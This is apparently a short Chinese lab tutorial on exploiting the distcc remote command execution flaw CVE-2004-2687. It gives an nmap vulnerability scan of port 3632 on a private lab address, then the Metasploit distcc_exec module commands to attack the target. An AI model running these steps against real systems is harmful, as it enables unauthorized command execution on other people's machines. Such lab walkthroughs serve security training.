distcc漏洞利用
Distcc是一个免费分布式编译C/C++编译工具。在其2.X版本中,存在配置漏洞,漏洞编号为CVE-2004-2687。一旦没有配置限制端口访问,就会被远程攻击者绕过认证,借助编译任务,执行任意命令。(来源:百度贴吧)
1.扫描漏洞
nmap --script=vuln -p 3632 192.168.84.128

二、漏洞利用
1.选择模块
use exploit/unix/misc/distcc_exec2.设置靶机ip,开始攻击
set rhosts 192.168.84.128 exploit

发表评论